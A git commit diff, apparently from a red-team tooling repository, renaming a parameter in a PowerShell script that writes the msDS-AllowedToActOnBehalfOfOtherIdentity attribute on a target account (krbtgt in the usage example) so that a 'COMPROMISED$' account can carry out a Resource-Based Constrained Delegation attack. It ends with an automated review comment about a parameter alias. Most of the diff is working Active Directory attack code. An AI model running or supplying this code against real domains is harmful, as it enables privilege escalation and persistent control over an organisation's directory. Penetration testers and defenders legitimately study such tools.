fixed paramter name

This commit is contained in:
mgeeky 2019-08-22 15:46:08 +02:00
parent 0062483b8b
commit a99ab7a0bf


@ -3,10 +3,10 @@
# #
# Usage: # Usage:
# PS> . .\Set-PrincipalAllowedToDelegateToAccount.ps1 # PS> . .\Set-PrincipalAllowedToDelegateToAccount.ps1
# PS> Set-PrincipalAllowedToDelegateToAccount -TargetUser krbtgt -TargetComputer COMPROMISED$ # PS> Set-PrincipalAllowedToDelegateToAccount -TargetUser krbtgt -DelegateFrom COMPROMISED$
# #
# Will allow for COMPROMISED$ machine account to perform S4U2 constrained delegation by the use # Will allow for COMPROMISED$ account to perform S4U2 constrained delegation by the use
# of Resource-Based Constrained Delegation flavour attack. # of Resource-Based Constrained Delegation flavour attack. This account must have any SPN set first.
# #
# Script for setting "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object, # Script for setting "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object,
# allowing incoming trust to the previously compromised Machine object, as described # allowing incoming trust to the previously compromised Machine object, as described
@ -31,11 +31,11 @@ function Set-PrincipalAllowedToDelegateToAccount
[Parameter(Position = 1)] [Parameter(Position = 1)]
[ValidateNotNullOrEmpty()] [ValidateNotNullOrEmpty()]
[String] [String]
$TargetComputer $DelegateFrom
) )
# translate the identity to a security identifier # translate the identity to a security identifier
$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $TargetComputer).Translate([System.Security.Principal.SecurityIdentifier])).Value $IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $DelegateFrom).Translate([System.Security.Principal.SecurityIdentifier])).Value
# Substitute the security identifier into the raw SDDL # Substitute the security identifier into the raw SDDL
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))" $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"
@ -46,4 +46,4 @@ function Set-PrincipalAllowedToDelegateToAccount
# set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity' # set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity'
Get-DomainUser $TargetUser | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose Get-DomainUser $TargetUser | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
} }
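Review bot: The rename from `$TargetComputer` to `$DelegateFrom` in the second hunk drops the old parameter name entirely, so any existing script that invokes the function with `-TargetComputer` will now fail parameter binding instead of working as before; placing `[Alias('TargetComputer')]` on the parameter, next to the existing `[ValidateNotNullOrEmpty()]` attribute, keeps those calls working while `-DelegateFrom` becomes the documented name. The usage comment in the first hunk now calls `COMPROMISED$` an "account" that only needs an SPN set, yet the sentence two lines below still says "previously compromised Machine object", so the header no longer agrees with itself on whether a non-machine account is accepted; one of the two lines should be reworded to match the other. The function Set-PrincipalAllowedToDelegateToAccount starts outside the second hunk, and its body between the second and third hunks is not shown here.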